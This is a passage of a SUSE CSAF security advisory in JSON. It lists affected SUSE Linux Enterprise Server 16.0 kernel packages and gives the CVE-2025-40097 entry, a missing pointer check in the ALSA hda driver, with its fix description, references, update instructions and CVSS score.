"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-40045"
},
{
"cve": "CVE-2025-40097",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40097"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nALSA: hda: Fix missing pointer check in hda_component_manager_init function\n\nThe __component_match_add function may assign the \u0027matchptr\u0027 pointer\nthe value ERR_PTR(-ENOMEM), which will subsequently be dereferenced.\n\nThe call stack leading to the error looks like this:\n\nhda_component_manager_init\n|-\u003e component_match_add\n |-\u003e component_match_add_release\n |-\u003e __component_match_add ( ... ,**matchptr, ... )\n |-\u003e *matchptr = ERR_PTR(-ENOMEM); // assign\n|-\u003e component_master_add_with_match( ... match)\n |-\u003e component_match_realloc(match, match-\u003enum); // dereference\n\nAdd IS_ERR() check to prevent the crash.\n\nFound by Linux Verification Center (linuxtesting.org) with SVACE.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40097",
"url": "https://www.suse.com/security/cve/CVE-2025-40097"
},
{
"category": "external",
"summary": "SUSE Bug 1252900 for CVE-2025-40097",
"url": "https://bugzilla.suse.com/1252900"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
